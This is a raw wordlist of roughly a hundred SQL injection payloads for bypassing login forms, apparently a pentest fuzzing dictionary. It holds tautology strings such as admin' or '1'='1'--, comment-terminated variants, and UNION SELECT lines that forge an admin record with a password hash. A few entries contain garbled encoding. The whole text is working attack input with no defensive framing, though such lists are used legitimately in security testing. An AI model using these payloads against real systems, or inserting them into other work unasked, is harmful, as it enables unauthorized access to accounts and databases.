
" "
" or "" "
" or ""&amp;"
" or ""*"
" or ""-"
" or ""^"
" or "x"="x
" or true--
"&amp;"
") or ("x")=("x
") or true--
")) or (("x"))=(("x
"*"
"-"
"^"
"or "a"="a
"or 4=4%00
"or 4=4--
"or"="a'='a
' '
' OR '1'='1
' or '' '
' or ''&amp;'
' or ''*'
' or ''-'
' or ''^'
' or 'x'='x
' or true--
'&amp;'
') or ('x')=('x
') or true--
')) or (('x'))=(('x
')or('a'='a
'*'
'-'
'OR 4=4%00
'^'
'or 4=4/*
'or''='
'or'='or'
'or'a'='a
'xor
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
1 or '1'='1' or 4=4
1 or '1'='1'=1
1'or'1'='1
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed0551234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
17..admin' or 'a'='a ÃÜÂëËæ±ã
a' having 1=1#
a' having 1=1--
a'or' 4=4--
admin
admin" #
admin" --
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin"/*
admin"or 1=1 or ""="
admin' #
admin' --
admin' OR 4=4/*
admin' UNION Select 1,1,1 FROM admin Where ''='
admin' or '1'='1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or '2'='2
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1/*
admin' or 2=2#
admin' or 4=4--
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin'--
admin'/*
admin'or 1=1 or ''='
admin888
c
or 1=1
or 1=1#
or 1=1--
or 1=1/*
or 4=4--
or true--
something
